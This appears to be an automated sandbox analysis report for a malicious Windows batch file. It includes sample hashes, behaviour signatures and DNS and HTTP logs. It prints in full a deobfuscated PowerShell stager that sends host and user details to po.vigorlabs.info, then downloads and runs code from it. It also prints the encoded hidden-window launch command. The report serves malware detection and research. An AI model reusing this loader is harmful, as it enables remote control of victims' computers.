7d69e0d82e74059115486fae5dd5ac6463c7fccd91dbbcaa9587117c7d201ddb

Resubmissions

22/04/2024, 22:02 UTC

240422-1xtwbagh68 10

22/04/2024, 19:25 UTC

240422-x42b7afa68 10

19/04/2024, 03:02 UTC

240419-djmthsfh8w 10

Analysis

max time kernel
1395s
max time network
1179s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
22/04/2024, 19:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat
Size

6KB
MD5

c3a090912dd6f7c536225858fb24387c
SHA1

3773938587b06c7dc300b3d973c715c685a28877
SHA256

267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7
SHA512

7ff0e8434fafbc88e3e444a0300504c01e3976c369662ec55c70e38c1178f8e383522362efc2c4bde8c338bbb6c14007617a8696a6cb2082036c00136db6f0f8
SSDEEP

192:UPtKEKMJRLI0WCUaypBO2xzk4oquKEwY6edkEEhd:UPtKdMJpJV2xo4oCEwAAhd

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

# powershell snippet 0

invoke-expression "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n$df=@(\"\")\n$h=\"\"\n$sc=\"\"\n$urls=@(\"https://po.vigorlabs.info:443\")\n$curl=\"/load/pages/index.php/\"\n$s=$urls[0]\nfunction CAM ($key,$IV){\ntry {$a = New-Object \"System.Security.Cryptography.RijndaelManaged\"\n} catch {$a = New-Object \"System.Security.Cryptography.AesCryptoServiceProvider\"}\n$a.Mode = [System.Security.Cryptography.CipherMode]::CBC\n$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros\n$a.BlockSize = 128\n$a.KeySize = 256\nif ($IV)\n{\nif ($IV.getType().Name -eq \"String\")\n{$a.IV = [System.Convert]::FromBase64String($IV)}\nelse\n{$a.IV = $IV}\n}\nif ($key)\n{\nif ($key.getType().Name -eq \"String\")\n{$a.Key = [System.Convert]::FromBase64String($key)}\nelse\n{$a.Key = $key}\n}\n$a}\nfunction ENC ($key,$un){\n$b = [System.Text.Encoding]::UTF8.GetBytes($un)\n$a = CAM $key\n$e = $a.CreateEncryptor()\n$f = $e.TransformFinalBlock($b, 0, $b.Length)\n[byte[]] $p = $a.IV + $f\n[System.Convert]::ToBase64String($p)\n}\nfunction DEC ($key,$enc){\n$b = [System.Convert]::FromBase64String($enc)\n$IV = $b[0..15]\n$a = CAM $key $IV\n$d = $a.CreateDecryptor()\n$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]0)))}\nfunction Get-Webclient ($Cookie) {\n$d = (Get-Date -Format \"yyyy-MM-dd\");\n$d = [datetime]::ParseExact($d,\"yyyy-MM-dd\",$null);\n$k = [datetime]::ParseExact(\"2999-12-01\",\"yyyy-MM-dd\",$null);\nif ($k -lt $d) {exit}\n$username = \"\"\n$password = \"\"\n$proxyurl = \"\"\n$wc = New-Object System.Net.WebClient;\n\nif ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}\nelseif($h){$script:s=\"https://$($h)/load/pages/index.php/\";$script:sc=\"https://$($h)\"}\n$wc.Headers.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0\")\n$wc.Headers.Add(\"Referer\",\"\")\nif ($proxyurl) {\n$wp = New-Object System.Net.WebProxy($proxyurl,$true);\nif ($username -and $password) {\n$PSS = ConvertTo-SecureString $password -AsPlainText -Force;\n$getcreds = new-object system.management.automation.PSCredential $username,$PSS;\n$wp.Credentials = $getcreds;\n} else { $wc.UseDefaultCredentials = $true; }\n$wc.Proxy = $wp; } else {\n$wc.UseDefaultCredentials = $true;\n$wc.Proxy.Credentials = $wc.Credentials;\n} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }\n$wc}\nfunction primern($url,$uri,$df) {\n$script:s=$url+$uri\n$script:sc=$url\n$script:h=$df\n$cu = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n$wp = New-Object System.Security.Principal.WindowsPrincipal($cu)\n$ag = [System.Security.Principal.WindowsBuiltInRole]::Administrator\n$procname = (Get-Process -id $pid).ProcessName\nif ($wp.IsInRole($ag)){$el=\"*\"}else{$el=\"\"}\ntry{$u=($cu).name+$el} catch{if ($env:username -eq \"$($env:computername)$\"){}else{$u=$env:username}}\n$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;1\"\ntry {$pp=enc -key rKru6ujEpc5b9ZsFrLrgy7+JwL/S6wzDQ2tzdSccxVg= -un $o} catch {$pp=\"ERROR\"}\n$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)\n$p = dec -key rKru6ujEpc5b9ZsFrLrgy7+JwL/S6wzDQ2tzdSccxVg= -enc $primern\nif ($p -like \"*key*\") {$p| iex}\n}\nfunction primers {\nif(![string]::IsNullOrEmpty(\"\") -and ![Environment]::UserDomainName.Contains(\"\"))\n{\n return;\n}\nforeach($url in $urls){\n$index = [array]::IndexOf($urls, $url)\ntry {primern $url $curl $df[$index]} catch {write-output $error[0]}}}\n$limit=30\nif($true){\n $wait = 60\n while($true -and $limit -gt 0){\n $limit = $limit -1;\n primers\n Start-Sleep $wait\n $wait = $wait * 2;\n }\n}\nelse\n{\n primers\n}\n"

# powershell snippet 1

[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true}

$df = ""

$h = ""

$sc = ""

$urls = "https://po.vigorlabs.info:443"

$curl = "/load/pages/index.php/"

$s = "https://po.vigorlabs.info:443"

function cam($key, $iv) {

try {

$a = new-object "System.Security.Cryptography.RijndaelManaged"

} catch {

$a = new-object "System.Security.Cryptography.AesCryptoServiceProvider"

}

$a.mode = [system.security.cryptography.ciphermode]::cbc

$a.padding = [system.security.cryptography.paddingmode]::zeros

URLs

exe.dropper

https://po.vigorlabs.info:443

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
11	4972	powershell.exe
28	4972	powershell.exe
33	4972	powershell.exe
37	4972	powershell.exe
40	4972	powershell.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4972	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 4972	2404	cmd.exe	82
PID 2404 wrote to memory of 4972	2404	cmd.exe	82

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKABbAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEgANABzAEkAQQBHAG8AeQA1ADIAVQBDAC8ANQAxAFgAVwAzAFAAYQBSAGgAUgArADEANgAvAFkAYQB2AFMAQQBFAGkAUQB1AFMAZAB6AEcARABEAE8AMQBaAGQAegBRAHgAagBZAEYANABzAHkAVQA4AFgAUQBXAGEAWQBHAE4AaABWAGIAWgBYAFIAawBJADUAYgAvADMAbgBGADAAaABpAEIATQBuAGEAVAAwAGUAbQB6ADIANwA1AC8AYQBkAEsANQBQAFIAUgBtAG0AMgBEAEsAKwBaAEQAawBkAE0AUAB2AEMAWQBEAFEAVABQADkAQgBYAE4ANgBKAHoASgB1ADkATgBUAHAARABJAFoATQBhAG4ANQBqAE0AZABVAHMAMQB1AGEAOABvAFIAcQBMAHIASwBJAHAAdQBtAFUAeAB2AGUAawBTADcAYQBlAGwAZwBYAGIATwBWADQAeQA2AC8ANQBhAGMAMQAzAGYAOABSAFoAZAAxADMAVQA4AEYAWgB0AC8AaABVAHcAVgBYAGkAeQAwAHoAdABWAHAAbwA1AEcATAA4AEkASABQAGgAVQB6AHAAVgBJAFUAOABtADQAbgBUAGwAeQA5AGYASQBGAGMATQBMADcAdAB1AEkAeABVADAAYQBlAFIAZwBnAG0AcgB3AEwARwBIAHIATQBGAC8AawBEAFIAVABYAE4AYQBJAG0AegBUAHQAbgBWAG0AUQB4AFcAawBHAGkAcwB5AHQAUwA4ACsANwBaAHAAdQA3ADEAYgAvADIAdABvACsAVQBHADcASwBGAGcAMQBUAFYAYgBCAFQAZgBUAEQAeQB6AFcAeABDADAAZABIAFQASABRAHcAUABVAG0AagBPAFEAbQAxADIASQB1AGEAYgA3AFkAaABFAFAAKwBJAFUAcwBvAFMANgAzAGIAaQBlAHYAcwBDAEwAZwBhAEwALwA2AHIAbgBEAE8AbQA3AEgAbQBQAHAAUgBRAFAAUABHAEgAUwBCAFcAUgBvAGUAQwBVAFMAQgB0AEkAbQAzAHgAUQBSADgAWAB6AEIASgBEADQARgA4AEsAUAB6AEMAQgBrAEgATgBFAGwANABOAHYAOAB1AGIALwBtAHUAWgBQADYATABTAGEARwBRAC8AVAB3AFYAOABmADIASQBmADAATABsAHIAZgBZAHYAUwBQAHEARABiAFUAcABDACsAOQBXAEoAdwAyAGMAQQBJAEcARABuAGIAUABjAGYAdwB6AG4AVAA0ADAAMwBPAGEAbgA1ADQAVABaAGUATQBCAE8AdwBqAHUASwA0AGwAUwBJAGMAbwBBAFMAcABoAC8ALwBiAEkAbgBFAGgAawBrAEMAUQBhAGwARgA1AEsAcwBUAHkAbgBpAHAAMgA4AHQASwArAE4AMwBKADMARABVAHMAVQBPAGIARQBEAGIATwBUAHUAcgBDACsASgBXADYAWQBYAFAAMwAxAGMATQBwAHYAKwBnAFoAaABSADkAcABOAG8AeQBJAGgAVwBWAGUAMwBSADMAUwBLAEgAZQBkAGIAUgBQAG8AUwBLAEQARgBQAEsAbQBSAHkAcgBHAGIASwAzAEQAWABoAFkATAB4AEIAWQBVAHYAUgB0AGYALwBoAEwAKwB4AHYAVAA1AFIAagBOAFYAUQB3AGIASABaAEEAbgBtAEkAYwBwAHcAUABNAFEAVgBGAEUAYQBTAFEAYgAwAEEAcAA0AG0AUgByAE0ARwA3AEcAZAA2AHcAYwBDAHgAcABwAG0AWgBDAEwAaQA5ADUAUgBsAE0AVABuADUAbwAzAHIAWgBOAG0AbgBYAGoAVAA4AEMAMwBMADUAbgByAGgATwA1AE0AcABhAEoAagBjADMAUgBFAHYAdAB3AEkAQgB2AE8AZgBFAG0AegBsAGYATwBqADgAVwBuADcAdQBlACsAOAA2AFIAZQB4AGUAOQB5AGoAMgBXAHgAWQAvADkAKwB4AGEARQArAE4AegB4AGIATgBDAG0AawAyAFkAWQB0AGwANwBkAGYAZQA0AHQAQgBoAFAASwAvAHQAagBqAEMAMwBiAGsAYwBZAEUAMwB5AFoATQBlAHQAMAA2AE8AWABDAFkAQgBuAEgAMwBuAGUAOABDAFgAeAB2ADIAQQAvAFQAOABvAHkAUwB0ADgATQBKAEEAdgBhADUATgA0AFEAZQBWAGQAMAAvAGYAOQBJAC8AVABnAFgAZgBDAGUAVABlAE8AVQBzADAAdwBEAGoAcABFAFEAOQA1AHoANQBaAEcAdgBkAHIAdQBIADkAQgBiAGgATgBnAGsAdgB3AGoAMABLAFAAMgBNAEIAUABjAEgAVQBWAEoASQBuAHIAZAArAHkAcgBDAGIAUgBNAHAAdgBrAFMAQwAzAE4AQQBwAFcASwA5AE4AWQAxADEAegBVAHYAcQB4ADYALwByAFgAbABhAGsASwBmAEwAYwBQADgAMwBqAHQAbAArAC8AZgBoADIAMAAyAGsARwB6ADUAWAA2AGQAMgB4AFkAVABDAFYASQBOADAASQBPAGgAYgBNADAAMQBaAEgAeQBoAG0ATQB5AHcAcQBMAG8ARQBlADMASgBPAGwAVgBvAEoAbQBlAHkAUABVAHEAdwAzADAARgB6AEwANAB5AHIAKwB2AFAARQBkAEQAUQBvAEEASQB6AEoAZwBkAEIAeQByAEMAZwBKAEgAcwA0AFQAVQBJAE8AOABVAGgARQBJAEIAYQBwAHAATwBVAHgAWgBHAGIANABlADMAOQBoAHgAZQAwAFEAOQBDAGsAbQBDAHUAUwBSAHYAZwBoAGMAYQA2AGkAcwBNADMAagBFAEoAegBWAE8ARgBaAGsAdABUAGMATgAwAEoAcABjAEcARgBSAGwAaQB5AGYAZwBWAHgALwBDAHcATgBFADgAbAB5AGYAcQBtADQAMQBPAHoAeQA4AGUARwBKAEMAZABLAHIAMwA4AFMATQBHAGIATQBHAFAAVgBiADQARABRAEkASwB6AE8AWABnAEMAUQBGADYASgBUAHoAeABOAGEAZQBOAFYAMgBDAFMAMQA5AHkAQgBUAHIAQgBTADUASABwAE4AVwBNADIAeAAyAEMAQgBCAE8AWABuAGIASQBHAHYALwBJAGgAOQBOAFcAKwAwAFgAWQA5AEMARQAxADQAbgB2AFIAYQBEAGQAYgBUAGYAaAB0AGsAVQBzAHUAMgBVAHkAcwBHACsAWQBXAHAAOQBsAGoAaABVAE0AMgBZAHgATABHAFEAUgAwAG4AcABJAEYAdQBqADcAcABKAHAAMQBYACsATABjAHcASAArAFAAVABBAFUAVABjAGoAZAB4AC8AdABLAHIAWQBtAEUAbABWAHMAagBkAGoAQgBhAEkAUQBGAGEAOAB0AGsATABBAEkAegBQAEoAagBOAC8AYwBOAFQARQBwAHkAcABRAFUAcAA1AGgAcwBWAGkAYwBqAGwAbQBrAEkAagBRAGoAMgBQAEoARQBnAFUAUwBNAHIAQgBNAFcATQB1AFUAdABXAHgAcAA1AHUAVQBTAEEAQQB4AHAAbwBjAFgAUwByAEEAWABoAFkAQQBSADkASQBBAEUAaQBwAHkAbQBwAEwASwB1AGoASABSADEAMABNAGoAeABjAG8AOQBoAEsAUgBRAGYARwBMAG8AYQBlAGIAQQBrAGkAQgA5AEcANQBZAEQATgBhAHAAUAByAFIAZQAvAFMANwBRADIAdwA4AEQAUwBoAEkAWABPAFYAQQBLAHQAbQBkADcANwBNAGYAbQBCADkAYgBBAC8AUQBqAEMAdABwAGsAQQBJADcAMwBWAFUAOABlAFIAMwBWAHkARgBLAFkAMwBrAEgASgBEADkAcgBGAGcAUwB0AHMAbgBPAE0AUQBOAFoAeAAzAEcARwBGAE4AWQBDAHYAMgBMAGIAdABsAEQAWABOADkANgBjAGQAUgBzAGMAbQBoAEQAZwBGAGYATgBNAHgARwBHAEcAVgArAEgAbABjAHAARQBzAFMAbwBFAHYASABxAE8AVgA4ADUAUgBzAGkATwB4AE8AaQArADYAdwBJAFMANwAxAE4AYwAyAGgAZwBHAEUAUABlAFkANQBUAGMATQB5AHkAZgB2AEcAVgA3ADAAQgBVADYARwBWAFIAWQBXAFUAYwBNAGIAVwAvAFUAUQA2AFAAaQAyAHAASQBnAEIAYwBCAFUANwBGACsAUQA4AFoAYwBGADcAdwBWAFAAZQB6AG8AVQBpAHgAMAA1ADAAbABTADUANQB4AHAAUwBXAEYAQwBXAEwAYQBVAGwAdwAyAEwAZABOAHAASQBXAFkAeAA0AEUAZwBDAGoAbQBuAE8ARQB6ADgAcwBLAGIAZwB1ADIARgBxAEEARABPAHMAcgBLADYAOABHAE4AdgBqAFEAUgBSAGcAcwBsAGMALwBjAEgAYQBhAEgAUABVAEEANwBnAEQAMQB4ADYAeABWAGQAWQAyAHUASQBLAHAANwBEAFQAYgBuADQAYgBZADAAZwBsAGoAMgBjAEgAZwBvAEwATgB4AEgAUABFAG0ATwB4AHoAQQB0AHQATAAzAHoAUAA5AGIAZQBsADUASwBMADcARwBjADgATwBvAGkAdQA2AGIAawBWAEwAbwBFAEoANAAxAHYARwBLAHoAaABkAFMATABHAFUAdwB2AEkAbAA2AG8AOQBIAE4AOABPACsAegBZAGYAUwBtAFAAKwA1AEYANAAzAGYARABYAGcAZgA5ADcARgBSAEkAZABGAHAAdQB1AGUAUABtAGUAUgBjAEcATgBBAGwAdwBEAE0AcwAvAFoASABGAFMAZgBPAGoAbAA4AGEAdgBwADYANwAvAFUAcABYAHcAcgA1ADUAdQBmAG4ALwArACsAZQB0AHMAWQBuAGEAdwArAFgAZgB6AFoAMQBwACsAUwBVAFIAeQB2AGIAKwBkAGQARQBoAFEAWgA4AGMAUgBoAHkAUQBWAEIAYgBtADgANAB2AEIAbABpAGwAeQB4AFQAYwBBAC8ANABZAGYAUQBGAE4AbQBzAEIAOQB0AHcAUABJAFgAQQBaADkAbQBCAFYAagB0AEIAOQBLAGsATABZAE0AVwAwAFMAOQByAC8AcwBRAG4AZgAyAEIAcABRAE4ARQBzAFkAWQB2ADIAZgBFAGYAUQBiAFMAbgByAGsANABPAGYASgAvAEMARwBmAHIAbgBmAE4ARgAyAFMAaQBDAGkAMgBUAHQAcAA0AGsAMQBDAHAASwBwAHIANgA1AGgASgBOADcASQAzAGoATABYAEcALwB4AGUAWQB2AHYAagBUADUATgBlADkAcwBDAGwAeQBMAEIAMQA0AFQANABBAHcAYgBrAHcAdwBjAEUAcwB3AG8AMQBDAHcAMgBlAEYARABMAGkAYwBFAHYAaQBSAFQAQgBjAHkANgA2AEIAUwBBAFYAdABPAHYARABBAGwAUwBqAGcAQQBpAGQAOQBJAGMASwBrAHkAYwB3AGcAegBuAGsAcABKAHMAWgB6ADYAUwBMAGkAWgBtAFoAZQBxAGIAaAA3ADYATgBuAFIANwBqAEkAMABNADgANgBVAEgASgB2AFYAcwBZAGsAWABjAFYAWQBGAFoAUQBjAEcAdwBRAEIAUQBhADgAZwBUADIAUgBpAG0ARgBoAEsAOAArAE8AOAB5AHIAbABDACsANQA3AHIANQBvAG8AcwBOADIARQBsAGcANwB2AFIAWABsAEcAbwB3ADQAYQBaAHIAagBhAHMARwB4AEMAdgBCAEIATwBSAG8ATQBvAHgAbgBFAHoAWgBMAEYAcwBGAGwAeQB0ADcAcAB2AGQAYQBxADcARQB0AHoAcQBQAE4ASgBVADYAbQBDAFUATQBwAFoAYgBkAFEAYwBwAHAAWABMADcALwB4AGwAcABXAHkARQBZAEsAcgB1AEcATwA4AGYAeQBkAHMANgAvAGgASABWAGcAZgBYADgATwBBAEEAQQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4972

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

ocsp.digicert.com

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com

iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com

IN A

20.223.35.26
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

195.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.61.62.23.in-addr.arpa

IN PTR

Response

195.61.62.23.in-addr.arpa

IN PTR

a23-62-61-195deploystaticakamaitechnologiescom
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

wu-bg-shim.trafficmanager.net

wu-bg-shim.trafficmanager.net

IN CNAME

download.windowsupdate.com.edgesuite.net

download.windowsupdate.com.edgesuite.net

IN CNAME

a767.dspw65.akamai.net

a767.dspw65.akamai.net

IN A

2.17.197.240

a767.dspw65.akamai.net

IN A

2.17.197.249
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com

iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com

IN A

20.223.36.55
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.243.30
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

po.vigorlabs.info

Remote address:

8.8.8.8:53

Request

po.vigorlabs.info

IN A

Response

po.vigorlabs.info

IN A

45.128.153.41
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

wwwprod.www-bing-com.akadns.net

wwwprod.www-bing-com.akadns.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

23.62.61.195

e86303.dscx.akamaiedge.net

IN A

23.62.61.176

e86303.dscx.akamaiedge.net

IN A

23.62.61.162

e86303.dscx.akamaiedge.net

IN A

23.62.61.185

e86303.dscx.akamaiedge.net

IN A

23.62.61.169

e86303.dscx.akamaiedge.net

IN A

23.62.61.193

e86303.dscx.akamaiedge.net

IN A

23.62.61.57

e86303.dscx.akamaiedge.net

IN A

23.62.61.59

e86303.dscx.akamaiedge.net

IN A

23.62.61.72
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com

iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com

IN A

20.223.35.26
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

240.197.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.197.17.2.in-addr.arpa

IN PTR

Response

240.197.17.2.in-addr.arpa

IN PTR

a2-17-197-240deploystaticakamaitechnologiescom
DNS

ris.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

ris.api.iris.microsoft.com

IN A

Response

ris.api.iris.microsoft.com

IN CNAME

ris-prod.trafficmanager.net

ris-prod.trafficmanager.net

IN CNAME

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

IN A

20.234.120.54
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

30.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.111.52.in-addr.arpa

IN PTR

Response
DNS

self.events.data.microsoft.com

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdaue00.australiaeast.cloudapp.azure.com

onedscolprdaue00.australiaeast.cloudapp.azure.com

IN A

40.79.173.40
DNS

40.173.79.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.173.79.40.in-addr.arpa

IN PTR

Response
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 430689
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C66473C2260D4234A4B9B7C7050B19EA Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:22 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 415458
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4DCC2A64DD434CC3A7DD7AE01B43BCFB Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:22 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
